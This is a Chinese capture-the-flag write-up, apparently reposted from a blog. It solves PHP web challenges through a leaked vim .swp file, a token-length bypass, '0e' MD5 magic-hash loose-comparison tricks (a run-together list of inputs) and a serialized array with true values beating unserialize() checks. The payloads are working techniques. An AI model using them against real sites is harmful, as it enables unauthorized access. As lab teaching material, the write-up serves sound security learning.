密码忘记了
一开始尝试了各种注入发现都无效,在网页源码中找到了admin 的地址,输入地址栏发现并没有什么有用的信息,随便输个邮箱,网页返回了一个地址 ./step2.php?email=youmail@mail.com&check=???????,还是没注入,没了思路,看了大佬的wp后才想起来vim编辑器才是关键:
用vim编写的文件会留下.swp的临时文件,试了一下step1.php与step2.php都不存在临时文件,在源码中还看到一个submit.php,试了一下.submit.php.swp,发现存在,
里面有一段关键代码:
1 if(!empty($token)&&!empty($emailAddress)){ 2 if(strlen($token)!=10) die('fail'); 3 if($token!='0') die('fail'); 4 $sql = "SELECT count(*) as num from `user` where token='$token' AND email='$emailAddress'"; 5 $r = mysql_query($sql) or die('db error'); 6 $r = mysql_fetch_assoc($r); 7 $r = $r['num']; 8 if($r>0){ 9 echo $flag; 10 }else{ 11 echo "澶辫触浜嗗憖"; 12 } 13 }这里要求token长度为10且token='0',还要传入admin的地址
构造payload:token=0000000000&emailAddress=admin@simplexue.com
成功拿到flag
查看源码发现提示,$test=$_GET['username']; $test=md5($test); if($test=='0')
一看就是php弱比较,在php中==号为弱比较'0e'开头剩下的全为数字不管数字是多少==恒成立
0e开头md5s878926199a0e545993274517709034328855841020s155964671a0e342768416822451524974117254469s214587387a0e848240448830537924465865611904s214587387a0e848240448830537924465865611904s878926199a0e545993274517709034328855841020s1091221200a0e940624217856561557816327384675s1885207154a0e509367213418206700842008763514s1502113478a0e861580163291561247404381396064s1885207154a0e509367213418206700842008763514s1836677006a0e481036490867661113260034900752s155964671a0e342768416822451524974117254469s1184209335a0e072485820392773389523109082030s1665632922a0e731198061491163073197128363787s1502113478a0e861580163291561247404381396064s1836677006a0e481036490867661113260034900752s1091221200a0e940624217856561557816327384675s155964671a0e342768416822451524974117254469s1502113478a0e861580163291561247404381396064s155964671a0e342768416822451524974117254469s1665632922a0e731198061491163073197128363787s155964671a0e342768416822451524974117254469s1091221200a0e940624217856561557816327384675s1836677006a0e481036490867661113260034900752s1885207154a0e509367213418206700842008763514s532378020a0e220463095855511507588041205815s878926199a0e545993274517709034328855841020s1091221200a0e940624217856561557816327384675s214587387a0e848240448830537924465865611904s1502113478a0e861580163291561247404381396064s1091221200a0e940624217856561557816327384675s1665632922a0e731198061491163073197128363787s1885207154a0e509367213418206700842008763514s1836677006a0e481036490867661113260034900752s1665632922a0e731198061491163073197128363787s878926199a0e545993274517709034328855841020
随便拿一个填入用户名中,提交后拿到一个路径
打开路径得到下列代码:
1 $unserialize_str = $_POST['password']; 2 $data_unserialize = unserialize($unserialize_str); 3 if($data_unserialize['user'] == '???' && $data_unserialize['pass']=='???') 4 { 5 print_r($flag); 6 }看到unserialize就是反序列化,serialize() 把变量和它们的值编码成文本形式,unserialize() 恢复原先变量。
根据提示,传入的password中包含user键的值要等于一个东西,pass键也要等于一个东西,这里因为是==而不是===,所以这依然是一个弱比较。
php中true==一切字符串,所以我们要构造一个数组,使里面user、pass的值为true,然后序列化一下就是password的值了
1 <?php 2 $str1 = ""; 3 $str1 = array("user"=>true, "pass"=>true); 4 echo var_dump(serialize($str1)); 5 ?>回到首页,填上账号密码就能拿到flag了
转载于:https://www.cnblogs.com/Ragd0ll/p/8644482.html
